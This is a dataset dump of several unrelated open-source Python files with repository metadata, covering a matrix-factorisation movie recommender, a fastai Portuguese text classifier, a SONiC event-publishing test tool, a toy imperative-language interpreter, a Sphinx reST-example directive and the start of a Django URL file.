rating of movie - mean))\r\n return sumNumerator/sumDenominator\r\n\r\n#print(predict_rating([0.41, 0.59], [2, 3]))\r\n\r\n#####\r\n##\r\n# LATENT FACTORS\r\n##\r\n#####\r\n\r\n#-------------------------------------------------Util---------------------------------------------------\r\ndef grid_search(samples, R, b, steps=500, gamma=0.01, lamda=0.01, rmse = False, bias = False):\r\n \"\"\"\r\n Perfomrs grid search to find the best pair of hyper paramters k and learning_rate\r\n \"\"\"\r\n\r\n ks = [25, 30]\r\n learn_rates = [0.01, 0.001, 0.0001]\r\n\r\n for k in ks:\r\n P = np.random.normal(scale=1./k, size=(len(R), k))\r\n Q = np.random.normal(scale=1./k, size=(len(R[0]), k))\r\n b_u = np.zeros(len(R))\r\n b_i = np.zeros(len(R[0]))\r\n for lr in learn_rates:\r\n newP, newQ, newB_u, newB_i = matrix_factr(samples, R, P, Q, b, b_u, b_i, gamma=lr, rmse=True, bias=True)\r\n rmse_score = get_rmse(R, newP, newQ, b, newB_u, newB_i, bias=True)\r\n with open('grid_search.txt', 'a') as f:\r\n print(f\"k={k}, lr={lr}, rmse={rmse_score}\", file=f)\r\n\r\n\r\ndef plot_rmse(mse):\r\n \"\"\"\r\n Plots the mean squared error over all steps\r\n :param mse:\r\n :return:\r\n \"\"\"\r\n indeces = [i for i, j in mse]\r\n mses = [j for i, j in mse]\r\n with open('mse_bias_100s.txt', 'w') as f:\r\n print(mses, file=f)\r\n plt.figure(figsize=((16,4)))\r\n plt.plot(indeces, mses)\r\n plt.xticks(indeces, indeces)\r\n plt.xlabel(\"Steps\")\r\n plt.ylabel(\"RMSE\")\r\n plt.grid(axis=\"y\")\r\n filename = time.strftime(\"%Y%m%d-%H%M%S\")\r\n plt.savefig(filename + '.png')\r\n\r\n\r\ndef get_rmse(R, P, Q, b, b_u, b_i, bias):\r\n \"\"\"\r\n Computes total mean squared error\r\n :param R:\r\n :param P:\r\n :param Q:\r\n :return:\r\n \"\"\"\r\n i_indeces, j_indeces = R.nonzero()\r\n pred = predict_all(P, Q, b, b_u, b_i, bias) \r\n e = 0\r\n for i, j in zip(i_indeces, j_indeces):\r\n e += pow(R[i][j] - pred[i][j], 2)\r\n return np.sqrt(e/len(i_indeces))\r\n\r\n\r\ndef predict_single(i, j, P, Q, b, b_u, b_i, bias = False):\r\n \"\"\"\r\n Predicts the rating for a single user i and item j\r\n \"\"\"\r\n if bias:\r\n return (b + b_u[i] + b_i[j] + np.dot(P[i, :], Q[:, j]))\r\n else:\r\n return np.dot(P[i, :], Q[:, j])\r\n\r\n\r\ndef predict_all(P, Q, b, b_u, b_i, bias = False):\r\n \"\"\"\r\n Return the whole prediction matrix\r\n \"\"\"\r\n if bias:\r\n return b + b_u[:, np.newaxis] + b_i[np.newaxis:, ] + np.dot(P, Q)\r\n else:\r\n return np.dot(P, Q)\r\n\r\n\r\n#-----------------------------------------------ALS-----------------------------------------------------------\r\n\r\ndef als_step(R, update_matrix, fixed_matrix, k, gamma):\r\n \"\"\"\r\n In ALS we update one matrix while the other stays the same\r\n \"\"\"\r\n A = fixed_matrix.T.dot(fixed_matrix) + np.eye(k) * gamma\r\n b = R.dot(fixed_matrix)\r\n A_inv = np.linalg.inv(A)\r\n update_matrix = b.dot(A_inv)\r\n\r\n return update_matrix\r\n\r\n\r\ndef matrix_als(R, P, Q, k, steps=100, gamma=0.01, rmse = False, bias = False):\r\n \"\"\"\r\n Alternating Least Sqaures method for optimizing\r\n P and Q matrices.\r\n \"\"\"\r\n rmse_data = []\r\n rmse_old = get_rmse(R, P, Q.T, 0, [], [], False)\r\n\r\n for step in tqdm(range(steps)):\r\n Q[Q < 0] = 0\r\n P = als_step(R, P, Q, k, gamma)\r\n P[P < 0] = 0\r\n Q = als_step(R.T, Q, P, k, gamma)\r\n\r\n if rmse:\r\n rmse_new = get_rmse(R, P, Q.T, 0, [], [], False)\r\n print(rmse_new)\r\n # Check for convergence and break if new RMSE is bigger than old\r\n if np.abs(rmse_new - rmse_old) < 0.0001:\r\n rmse_data.append((step + 1, 
rmse_new))\r\n break\r\n else:\r\n rmse_data.append((step + 1, rmse_new))\r\n rmse_old = rmse_new\r\n if rmse:\r\n plot_rmse(rmse_data)\r\n\r\n return P, Q\r\n\r\n\r\n#-----------------------------------------------SDG-----------------------------------------------------------\r\n\r\n\r\ndef matrix_factr(samples, R, P, Q, b, b_u, b_i, steps=300, gamma=0.01, lamda=0.01, rmse = False, bias = False):\r\n '''\r\n R: Ratings matrix\r\n P: |users| * k - user feature matrix\r\n Q: |movies| * k - movie feature matrix\r\n ks: number of latent features we want\r\n steps: iterations\r\n gamma: learning rate\r\n lamda: regularization rate - bigger rate means less overfitting\r\n '''\r\n\r\n Q = Q.T\r\n rmse_data = []\r\n rmse_old = get_rmse(R, P, Q, b, b_u, b_i, bias)\r\n rmse_data.append((0, rmse_old))\r\n\r\n for step in tqdm(range(steps)):\r\n np.random.shuffle(samples)\r\n for i, j, r in samples:\r\n # Error calculation\r\n e = r - predict_single(i, j, P, Q, b, b_u, b_i, bias)\r\n # Bias calculation\r\n if bias:\r\n b_u[i] += gamma * (e - lamda * b_u[i])\r\n b_i[j] += gamma * (e - lamda * b_i[j])\r\n # Gradient calculation\r\n p_old = P[i, :][:]\r\n P[i,:] += gamma * (e * Q[:,j] - lamda * P[i,:])\r\n Q[:,j] += gamma * (e * p_old - lamda * Q[:,j])\r\n\r\n if (step + 1) % 10 == 0 and rmse:\r\n rmse_new = get_rmse(R, P, Q, b, b_u, b_i, bias)\r\n # Check for convergence and break if new RMSE is bigger than old\r\n if np.abs(rmse_new - rmse_old) < 0.0001:\r\n rmse_data.append((step + 1, rmse_new))\r\n break\r\n else:\r\n rmse_data.append((step + 1, rmse_new))\r\n rmse_old = rmse_new\r\n if rmse:\r\n plot_rmse(rmse_data)\r\n\r\n return P, Q, b_u, b_i\r\n\r\n#-----------------------------------------------Prediction functions for LF-----------------------------------------------------------\r\n\r\n\r\ndef predict_latent_factors_with_bias(movies, users, ratings, predictions):\r\n # R: Ratings matrix\r\n R = ratings.to_numpy()\r\n # n: number of users\r\n n = len(R)\r\n # m: number of movies\r\n m = len(R[0])\r\n # k: number of features\r\n k = 25\r\n # bias: do we want to include bias in our computation\r\n bias_value = True\r\n\r\n # Initialise random P and Q matrices\r\n P = np.random.normal(scale=1./k, size=(n, k))\r\n Q = np.random.normal(scale=1./k, size=(m, k))\r\n\r\n # Initialise biases\r\n b = np.mean(R[np.where(R != 0)])\r\n b_u = np.zeros(n)\r\n b_i = np.zeros(m)\r\n\r\n # Throw away 0 rated entries once instead\r\n # of checking every step if R[i][j] is 0\r\n samples = [\r\n (i, j, R[i, j])\r\n for i in range(n)\r\n for j in range(m)\r\n if R[i][j] > 0\r\n ]\r\n\r\n newP, newQ, newB_u, newB_i = matrix_factr(samples, R, P, Q, b, b_u, b_i, rmse=True, bias=bias_value)\r\n # newP, newQ = matrix_als(R, P, Q, k, rmse=True, bias=bias_value)\r\n\r\n newR = predict_all(newP, newQ, b, newB_u, newB_i, bias=bias_value)\r\n # newR = predict_all(newP, newQ.T, b, b_u, b_i)\r\n\r\n number_predictions = len(predictions)\r\n result = [[idx+1, newR[predictions.movieID[idx]-1, predictions.userID[idx]-1]] for idx in range(0, number_predictions)]\r\n return result\r\n\r\n\r\ndef predict_latent_factors_no_bias(movies, users, ratings, predictions):\r\n # R: Ratings matrix\r\n R = ratings.to_numpy()\r\n # n: number of users\r\n n = len(R)\r\n # m: number of movies\r\n m = len(R[0])\r\n # k: number of features\r\n k = 25\r\n # bias: do we want to include bias in our computation\r\n bias_value = False\r\n\r\n # Initialise random P and Q matrices\r\n P = np.random.normal(scale=1./k, size=(n, k))\r\n Q = 
np.random.normal(scale=1./k, size=(m, k))\r\n\r\n # Initialise biases\r\n b = np.mean(R[np.where(R != 0)])\r\n b_u = np.zeros(n)\r\n b_i = np.zeros(m)\r\n\r\n # Throw away 0 rated entries once instead\r\n # of checking every step if R[i][j] is 0\r\n samples = [\r\n (i, j, R[i, j])\r\n for i in range(n)\r\n for j in range(m)\r\n if R[i][j] > 0\r\n ]\r\n\r\n newP, newQ, newB_u, newB_i = matrix_factr(samples, R, P, Q, b, b_u, b_i, rmse=True, bias=bias_value)\r\n newR = predict_all(newP, newQ, b, newB_u, newB_i, bias=bias_value)\r\n\r\n number_predictions = len(predictions)\r\n result = [[idx+1, newR[predictions.movieID[idx]-1, predictions.userID[idx]-1]] for idx in range(0, number_predictions)]\r\n return result\r\n\r\n\r\ndef predict_latent_factors_ALS(movies, users, ratings, predictions):\r\n # R: Ratings matrix\r\n R = ratings.to_numpy()\r\n # n: number of users\r\n n = len(R)\r\n # m: number of movies\r\n m = len(R[0])\r\n # k: number of features\r\n k = 25\r\n # bias: do we want to include bias in our computation\r\n\r\n # Initialise random P and Q matrices\r\n P = np.random.normal(scale=1./k, size=(n, k))\r\n Q = np.random.normal(scale=1./k, size=(m, k))\r\n\r\n newP, newQ = matrix_als(R, P, Q, k, rmse=True)\r\n\r\n newR = predict_all(newP, newQ.T, b, b_u, b_i)\r\n\r\n number_predictions = len(predictions)\r\n result = [[idx+1, newR[predictions.movieID[idx]-1, predictions.userID[idx]-1]] for idx in range(0, number_predictions)]\r\n return result\r\n\r\n#####\r\n##\r\n# FINAL PREDICTORS\r\n##\r\n#####\r\n\r\n\r\ndef predict_final(movies, users, ratings, predictions):\r\n # TO COMPLETE\r\n\r\n pass\r\n\r\n\r\n\r\n#####\r\n##\r\n# SAVE RESULTS\r\n##\r\n##### \r\n\r\n\r\n# //!!\\\\ TO CHANGE by your prediction function\r\npredictions = predict_latent_factors_with_bias(movies_description, users_description, ratings, predictions_description)\r\n\r\n# Save predictions, should be in the form 'list of tuples' or 'list of lists'\r\nwith open(submission_file, 'w') as submission_writer:\r\n # Formates data\r\n predictions = [map(str, row) for row in predictions]\r\n predictions = [','.join(row) for row in predictions]\r\n predictions = 'Id,Rating\\n' + '\\n'.join(predictions)\r\n\r\n # Writes it dowmn\r\n submission_writer.write(predictions)\r\n","repo_name":"balysMorkunas/movie-recommender-system","sub_path":"mrs/main/step1-recommender-systems.py","file_name":"step1-recommender-systems.py","file_ext":"py","file_size_in_byte":15816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30609223714","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nfrom pathlib import Path\nimport seaborn as sns\nfrom fastai.text import *\nfrom fastai import __version__\n\n\n# In[2]:\n\n\nprint(\"Python version: {}\". format(sys.version))\nprint(\"seaborn version: {}\". format(sns.__version__))\nprint(\"fastai version: {}\". 
format(__version__))\n\n\n# # Preparando os dados\n\n# In[3]:\n\n\n# setando o path para os dados\npath = Path('./data')\n\n\n# In[ ]:\n\n\ndf = pd.read_csv(path/'treinamento.csv', encoding = 'ISO-8859-1')\n\n\n# In[ ]:\n\n\ndf.shape\n\n\n# In[ ]:\n\n\ndf.isnull().sum()\n\n\n# In[ ]:\n\n\ndf.head()\n\n\n# In[ ]:\n\n\ndf['categoria'].value_counts()\n\n\n# In[ ]:\n\n\nsns.set(style=\"darkgrid\")\nax = sns.countplot(x=\"categoria\", data=df)\nplt.show()\n\n\n# In[ ]:\n\n\ndf.to_csv(path/'treinamento_utf-8.csv', encoding = 'utf-8')\n\n\n# ### Criação de um objeto \"Databunch\" para realizar \"Tokenization\" e \"Numericalization\" dos dados.\n\n# In[ ]:\n\n\ndata = TextDataBunch.from_csv(path, 'treinamento_utf-8.csv', text_cols='mensagem', label_cols='categoria')\n\n\n# ### Tokenization\n\n# In[ ]:\n\n\ndata.show_batch()\n\n\n# In[ ]:\n\n\ndata.train_ds[0][0]\n\n\n# ### Numericalization\n\n# In[ ]:\n\n\ndata.vocab.itos[:18]\n\n\n# In[ ]:\n\n\ndata.train_ds[0][0].data[:10]\n\n\n# # Modelo de Linguagem\n\n# In[5]:\n\n\nbs=48\n\n\n# In[ ]:\n\n\ntokenizer = Tokenizer(SpacyTokenizer, 'pt')\nprocessor = [TokenizeProcessor(tokenizer=tokenizer), NumericalizeProcessor(max_vocab=30000)]\n\n\n# ### Criando o DataBunch \n\n# In[ ]:\n\n\ndata_lm = (TextList.from_csv(path, 'treinamento_utf-8.csv', cols='mensagem', processor=processor) \n .split_by_rand_pct(0.1, seed=50) #Dividindo randomicamente o dataset em 10% para validação\n .label_for_lm() ##Setando a coluna de label\n .databunch(bs=bs))\ndata_lm.save('data_lm.pkl')\n\n\n# In[6]:\n\n\ndata_lm = load_data(path, 'data_lm.pkl', bs=bs)\n\n\n# In[10]:\n\n\ndata_lm.show_batch()\n\n\n# ### Criando o modelo de linguagem\n# \n# A partir de um modelo de linguagem \"pré-treinado\", será criado um modelo customizado para as mensagens.\n\n# In[ ]:\n\n\n# Nomes dos arquivos de modelo e vocabulário pré-treinado\npretrained_fnames = ('lm_Pt_Br_30kt_ft', 'itos')\nlearn = language_model_learner(data_lm, AWD_LSTM, pretrained_fnames=pretrained_fnames, drop_mult=0.3)\n\n\n# In[12]:\n\n\nlearn.lr_find()\n\n\n# In[13]:\n\n\nlearn.recorder.plot(skip_end=3)\n\n\n# ### Treinando o modelo \n\n# In[14]:\n\n\nlearn.fit_one_cycle(1, 1e-1, moms=(0.8,0.7))\n\n\n# In[ ]:\n\n\nlearn.unfreeze()\n\n\n# In[16]:\n\n\nlearn.fit_one_cycle(10, 1e-2, moms=(0.8,0.7))\n\n\n# In[ ]:\n\n\nlearn.save('lm_reviews_ft')\n\n\n# In[ ]:\n\n\nlearn.load('lm_reviews_ft');\n\n\n# ### Testando o modelo\n# \n# Testando as previsões realizadas pelo modelo de próximas palavras de um texto inserido.\n\n# In[ ]:\n\n\nTEXT = \"Depois de realizar\"\nN_WORDS = 18\n\n\n# In[22]:\n\n\nlearn.predict(TEXT, N_WORDS, temperature=0.75)\n\n\n# ### Salvando o encoder para utilização no classificador\n\n# In[ ]:\n\n\nlearn.save_encoder('lm_reviews_ft_enc')\n\n\n# # Classificador\n\n# In[ ]:\n\n\nbs=48\n\n\n# In[ ]:\n\n\ntokenizer = Tokenizer(SpacyTokenizer, 'pt')\nprocessor = [TokenizeProcessor(tokenizer=tokenizer), NumericalizeProcessor(max_vocab=30000)]\n\n\n# In[ ]:\n\n\ndata_clas = (TextList.from_csv(path, 'treinamento_utf-8.csv', cols='mensagem', vocab=data_lm.vocab, processor=processor) \n .split_by_rand_pct(0.1, seed=50) #Dividindo randomicamente o dataset em 10% para validação\n .label_from_df(cols='categoria') #Setando a coluna de label \n .databunch(bs=bs))\ndata_clas.save('data_clas.pkl')\n\n\n# In[7]:\n\n\ndata_clas = load_data(path, 'data_clas.pkl', bs=bs)\n\n\n# In[79]:\n\n\ndata_clas.show_batch()\n\n\n# ### Criando o modelo\n# \n# Criando o modelo para classificação das mensagens e carregando o encoder salvo 
anteriormente.\n\n# In[39]:\n\n\nwgts_fname = path/'models'/'lm_Pt_Br_30kt_ft.pth'\nitos_fname = path/'models'/'itos.pkl'\n\nmodel = get_text_classifier(AWD_LSTM, len(data_clas.vocab.itos), data_clas.c, drop_mult=0.5)\nlearn = RNNLearner(data_clas, model, split_func=awd_lstm_clas_split) \nlearn.load_pretrained(wgts_fname, itos_fname, strict=False)\nlearn.freeze()\n\n\n# In[40]:\n\n\nlearn.load_encoder('lm_reviews_ft_enc')\n\n\n# In[20]:\n\n\nlearn.lr_find()\n\n\n# In[21]:\n\n\nlearn.recorder.plot()\n\n\n# In[22]:\n\n\nlr=2e-2\nlr *= bs/48\n\n\n# ### Treinando o modelo\n\n# In[23]:\n\n\nlearn.fit_one_cycle(2, lr, moms=(0.8,0.7))\n\n\n# In[24]:\n\n\nlearn.freeze_to(-2)\nlearn.fit_one_cycle(2, slice(lr/(2.6**4),lr), moms=(0.8,0.7))\n\n\n# In[27]:\n\n\nlearn.freeze_to(-3)\nlearn.fit_one_cycle(2, slice(lr/2/(2.6**4),lr/2), moms=(0.8,0.7))\n\n\n# In[42]:\n\n\nlearn.unfreeze()\nlearn.fit_one_cycle(1, slice(lr/10/(2.6**4),lr/10), moms=(0.8,0.7))\n\n\n# #### Salvando o modelo com acurácia de 91%.\n\n# In[43]:\n\n\nlearn.save('clas_reviews_ft')\n\n\n# ### Testando o modelo \n# \n# Testando a classificação realizada pelo modelo de uma mensagem inserida. \n\n# In[48]:\n\n\nlearn.predict(\"O atendimento foi muito bom\")\n\n","repo_name":"castortroynz/desafio_atuacao19","sub_path":"desafio_atuacao19.py","file_name":"desafio_atuacao19.py","file_ext":"py","file_size_in_byte":4914,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"39129123614","text":"from swsscommon.swsscommon import events_init_publisher, events_deinit_publisher, event_publish, FieldValueMap\nimport time\nimport sys\nimport ipaddress\nimport random\nimport argparse\nimport json\nimport logging\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s [%(levelname)s] %(message)s\",\n handlers = [\n logging.FileHandler(\"debug.log\"),\n logging.StreamHandler(sys.stdout)\n ]\n)\n\ndef getTag(sourceTag):\n try:\n return sourceTag.split(\":\", 1)[1]\n except Exception as ex:\n logging.info(\"Unable to find : in :tag\\n\")\n return sourceTag\n\ndef getFVMFromParams(params):\n param_dict = FieldValueMap()\n for key, value in params.items():\n key = str(key)\n value = str(value)\n param_dict[key] = value\n return param_dict\n\ndef publishEvents(line, publisher_handle):\n try:\n json_dict = json.loads(line)\n except Exception as ex:\n logging.error(\"JSON string not able to be parsed\\n\")\n return\n if not json_dict or len(json_dict) != 1:\n logging.error(\"JSON string not able to be parsed\\n\")\n return\n sourceTag = list(json_dict)[0]\n params = list(json_dict.values())[0]\n tag = getTag(sourceTag)\n param_dict = getFVMFromParams(params)\n if param_dict:\n event_publish(publisher_handle, tag, param_dict)\n\ndef publishEventsFromFile(publisher_handle, infile, count, pause):\n try:\n with open(infile, 'r') as f:\n for line in f.readlines():\n line.rstrip()\n publishEvents(line, publisher_handle)\n time.sleep(pause)\n except Exception as ex:\n logging.error(\"Unable to open file from given path or has incorrect json format, gives exception {}\\n\".format(ex))\n logging.info(\"Switching to default bgp state publish events\\n\")\n publishBGPEvents(publisher_handle, count, pause)\n\ndef publishBGPEvents(publisher_handle, count, pause):\n ip_addresses = []\n param_dict = FieldValueMap()\n\n for _ in range(count):\n ip = str(ipaddress.IPv4Address(random.randint(0, 2 ** 32)))\n ip_addresses.append(ip)\n\n # publish down events\n for ip in ip_addresses:\n param_dict[\"ip\"] = ip\n 
param_dict[\"status\"] = \"down\"\n event_publish(publisher_handle, \"bgp-state\", param_dict)\n time.sleep(pause)\n\n # publish up events\n for ip in ip_addresses:\n param_dict[\"ip\"] = ip\n event_publish(publisher_handle, \"bgp-state\", param_dict)\n time.sleep(pause)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-s\", \"--source\", nargs='?', const='test-event-source', default='test-event-source', help=\"Source of event, default us test-event-source\")\n parser.add_argument(\"-f\", \"--file\", nargs='?', const='', default='', help=\"File containing json event strings, must be in format \\'{\\\":foo\\\": {\\\"aaa\\\": \\\"AAA\\\", \\\"bbb\\\": \\\"BBB\\\"}}\\'\")\n parser.add_argument(\"-c\", \"--count\", nargs='?', type=int, const=10, default=10, help=\"Count of default bgp events to be generated\")\n parser.add_argument(\"-p\", \"--pause\", nargs='?', type=float, const=0.0, default=0.0, help=\"Pause time wanted between each event, default is 0\")\n args = parser.parse_args()\n publisher_handle = events_init_publisher(args.source)\n if args.file == '':\n publishBGPEvents(publisher_handle, args.count, args.pause)\n else:\n publishEventsFromFile(publisher_handle, args.file, args.count, args.pause)\n events_deinit_publisher(publisher_handle)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sonic-net/sonic-buildimage","sub_path":"src/sonic-eventd/tools/events_publish_tool.py","file_name":"events_publish_tool.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":614,"dataset":"github-code","pt":"60"} +{"seq_id":"16423317654","text":"\n\n\ndef main(text) :\n\tstmt, lbl, text = preprocess(text)\n\tprint(evaluate(stmt, lbl, text))\n\nfrom itertools import chain\ndef preprocess(lines) :\n\tstatements = []\n\tlabels = {}\n\toutput\t = []\n\tfor line in lines :\n\t\tif \":\" in line :\n\t\t\tcolon = line.index(\":\")\n\t\t\tlabel = line[:colon].strip()\n\t\t\tlabels[label] = len(statements)\n\t\t\tline = line[colon+1:].strip()\n\t\tif not line.strip() :\n\t\t\tcontinue\n\n\t\tif \"include\" in line :\n\t\t\tpos = line.index(\"include\") + 7\n\t\t\twith open(line[7:].strip(), \"r\") as file :\n\t\t\t\tsts, lbs, txs = preprocess(file.readlines())\n\t\t\tstatements += sts\n\t\t\tfor k, v in lbs.items() :\n\t\t\t\tlabels[k] = v\n\t\t\toutput += txs\n\t\telif \"<-\" in line :\n\t\t\tarrow = line.index(\"<-\")\n\t\t\tdestination = line[:arrow].strip()\n\t\t\tsource = expression(line[arrow+2:].strip())\n\t\t\tstatements.append( (\"assignment\", destination, source) )\n\t\telif \"exit\" in line :\n\t\t\tret = line.index(\"exit\")\n\t\t\treturned = line[ret+4:].strip()\n\t\t\tstatements.append( (\"exit\", returned) )\n\t\telif \"goto\" in line :\n\t\t\tgoto = line.index(\"goto\")\n\t\t\tdestination = line[goto+4:].strip()\n\t\t\tstatements.append( (\"goto\", destination) )\n\t\telif \"if\" in line :\n\t\t\tscrutinee, dest = line.strip()[2:].split()\n\t\t\tstatements.append( (\"if\", scrutinee, dest) )\n\t\telif \"unless\" in line :\n\t\t\tscrutinee, dest = line.strip()[6:].split()\n\t\t\tstatements.append( (\"unless\", scrutinee, dest) )\n\t\telif \"push\" in line :\n\t\t\tvar = line.strip()[4:].strip()\n\t\t\tstatements.append( (\"push\", var) )\n\t\telif \"pop\" in line :\n\t\t\tvar = line.strip()[3:].strip()\n\t\t\tstatements.append( (\"pop\", var) )\n\t\telif \"call\" in line :\n\t\t\tfunc = line.strip()[4:].strip()\n\t\t\tstatements.append( (\"call\", func) )\n\t\telif \"return\" in line :\n\t\t\treturned = 
line.strip()[6:].strip()\n\t\t\tstatements.append( (\"return\", returned) )\n\t\toutput.append(line)\n\treturn statements , labels, output\n\nbinops = \"+-*/=\"\ndef expression(expr) :\n\tfor op in binops :\n\t\tif op in expr :\n\t\t\tpos = expr.index(op)\n\t\t\trand1 = expr[:pos].strip()\n\t\t\trand2 = expr[pos+1:].strip()\n\t\t\treturn (op, rand1, rand2)\n\tif expr.isnumeric() :\n\t\treturn (\"constant\", int(expr))\n\telif expr.strip() in [\"false\", \"true\"] :\n\t\treturn (\"constant\", eval(expr))\n\telse :\n\t\treturn (\"variable\", expr)\n\n\ndef evaluate(statements, labels, text, env={}, stack=[]) :\n\tpc = 0\n\twhile True :\n\t\tinst = statements[pc]\n\t\tprint(\"[\" + str(pc) + \"]\\t\" + text[pc].strip().ljust(20) + str(stack).ljust(10) + str(env))\n\n\t\ttype = inst[0]\n\t\tif type == \"exit\" :\n\t\t\treturn env[inst[1]]\n\t\telif type == \"assignment\" :\n\t\t\tlhs, rhs = inst[1], inst[2]\n\t\t\tif rhs[0] == \"constant\" :\n\t\t\t\tenv[lhs] = rhs[1]\n\t\t\telif rhs[0] == \"variable\" :\n\t\t\t\tenv[lhs] = env[rhs]\n\t\t\telif rhs[0] == \"+\" :\n\t\t\t\tenv[lhs] = env[rhs[1]] + env[rhs[2]]\n\t\t\telif rhs[0] == \"-\" :\n\t\t\t\tenv[lhs] = env[rhs[1]] - env[rhs[2]]\n\t\t\telif rhs[0] == \"=\" :\n\t\t\t\tenv[lhs] = env[rhs[1]] == env[rhs[2]]\n\t\t\tpc += 1\n\t\telif type == \"goto\" :\n\t\t\tpc = labels[inst[1]]\n\t\telif type == \"if\" :\n\t\t\tif env[inst[1]] :\n\t\t\t\tpc = labels[inst[2]]\n\t\t\telse :\n\t\t\t\tpc += 1\n\t\telif type == \"unless\" :\n\t\t\tif env[inst[1]] :\n\t\t\t\tpc += 1\n\t\t\telse :\n\t\t\t\tpc = labels[inst[2]]\n\t\telif type == \"pop\" :\n\t\t\tenv[inst[1]] = stack.pop()\n\t\t\tpc += 1\n\t\telif type == \"push\" :\n\t\t\tstack.append( env[inst[1]] )\n\t\t\tpc += 1\n\t\telif type == \"call\" :\n\t\t\tstack.append( pc+1 )\n\t\t\tpc = labels[inst[1]]\n\t\telif type == \"return\" :\n\t\t\tpc = stack.pop()\n\t\t\tstack.append( env[inst[1]] )\n\t\telse :\n\t\t\traise Exception(\"OMG\" + str(inst))\n\n\ndef getInput() :\n\ttext = []\n\tline = 0\n\twhile True :\n\t\tinp = input(str(line) + \"\\t\")\n\t\tif inp :\n\t\t\tline += 1\n\t\t\ttext.append(inp)\n\t\telse :\n\t\t\tbreak\n\treturn text\n\nimport sys\nif __name__ == \"__main__\" :\n\targv = sys.argv\n\tif \"-f\" in argv :\n\t\tpos = argv.index(\"-f\") + 1\n\t\twith open(argv[pos], \"r\") as file :\n\t\t\tsample = file.readlines()\n\telse :\n\t\tsample = getInput()\n\tmain(sample)\n","repo_name":"simonl/assm","sub_path":"compiler/toyimperative.py","file_name":"toyimperative.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36433350715","text":"from typing import Any, Dict, List, Sequence\n\n# 3rd party\nimport sphinx.environment\nfrom docutils import nodes\nfrom docutils.parsers.rst import directives\nfrom docutils.statemachine import ViewList\nfrom domdf_python_tools.stringlist import StringList\nfrom sphinx.application import Sphinx\nfrom sphinx.util.docutils import SphinxDirective\n\n# this package\nfrom sphinx_toolbox.utils import OptionSpec, Purger, SphinxExtMetadata, metadata_add_version\n\n__all__ = (\"reSTExampleDirective\", \"make_rest_example\", \"rest_example_purger\", \"setup\")\n\n\nclass reSTExampleDirective(SphinxDirective):\n\t\"\"\"\n\tDirective to show some reStructuredText source, and the rendered output.\n\t\"\"\"\n\n\thas_content: bool = True\n\n\t# Options to pass through to .. 
code-block::\n\toption_spec: OptionSpec = { # type: ignore[assignment]\n\t\t\"force\": directives.flag,\n\t\t\"emphasize-lines\": directives.unchanged,\n\t\t\"tab-width\": int,\n\t\t\"dedent\": int,\n\t\t}\n\n\tdef run(self) -> List[nodes.Node]:\n\t\t\"\"\"\n\t\tCreate the rest_example node.\n\t\t\"\"\"\n\n\t\ttargetid = f'example-{self.env.new_serialno(\"sphinx-toolbox rest_example\"):d}'\n\t\ttargetnode = nodes.target('', '', ids=[targetid])\n\n\t\tcontent = make_rest_example(\n\t\t\t\tself.options,\n\t\t\t\tself.env,\n\t\t\t\tself.content, # type: ignore[arg-type]\n\t\t\t\t)\n\t\tview = ViewList(content)\n\n\t\texample_node = nodes.paragraph(rawsource=content) # type: ignore[arg-type]\n\t\tself.state.nested_parse(view, self.content_offset, example_node) # type: ignore[arg-type]\n\n\t\trest_example_purger.add_node(self.env, example_node, targetnode, self.lineno)\n\n\t\treturn [targetnode, example_node]\n\n\ndef make_rest_example(\n\t\toptions: Dict[str, Any],\n\t\tenv: sphinx.environment.BuildEnvironment,\n\t\tcontent: Sequence[str],\n\t\t) -> List[str]:\n\t\"\"\"\n\tMake the content of a reST Example node.\n\n\t:param options:\n\t:param content: The user-provided content of the directive.\n\t\"\"\"\n\n\toutput = StringList(\".. container:: rest-example\")\n\toutput.indent_type = ' ' * env.config.docutils_tab_width\n\n\toutput.blankline()\n\n\twith output.with_indent_size(1):\n\n\t\toutput.append(\".. code-block:: rest\")\n\n\t\twith output.with_indent_size(2):\n\t\t\tfor option, value in options.items():\n\t\t\t\tif value is None:\n\t\t\t\t\toutput.append(f\":{option}:\")\n\t\t\t\telse:\n\t\t\t\t\toutput.append(f\":{option}: {value}\")\n\n\t\t\toutput.blankline()\n\t\t\toutput.extend(content)\n\n\t\toutput.blankline(ensure_single=True)\n\t\toutput.extend(content)\n\t\toutput.blankline(ensure_single=True)\n\n\treturn list(output)\n\n\n#: Purger to track rest-example nodes, and remove redundant ones.\nrest_example_purger = Purger(\"all_rest_example_nodes\")\n\n\n@metadata_add_version\ndef setup(app: Sphinx) -> SphinxExtMetadata:\n\t\"\"\"\n\tSetup :mod:`sphinx_toolbox.rest_example`.\n\n\t.. versionadded:: 0.7.0\n\n\t:param app: The Sphinx application.\n\t\"\"\"\n\n\t# Hack to get the docutils tab size, as there doesn't appear to be any other way\n\tapp.setup_extension(\"sphinx_toolbox.tweaks.tabsize\")\n\tapp.setup_extension(\"sphinx_toolbox._css\")\n\n\tapp.add_directive(\"rest-example\", reSTExampleDirective)\n\tapp.connect(\"env-purge-doc\", rest_example_purger.purge_nodes)\n\n\treturn {\"parallel_read_safe\": True}\n","repo_name":"sphinx-toolbox/sphinx-toolbox","sub_path":"sphinx_toolbox/rest_example.py","file_name":"rest_example.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"60"} +{"seq_id":"9322691598","text":"from django.urls import path\nfrom . 
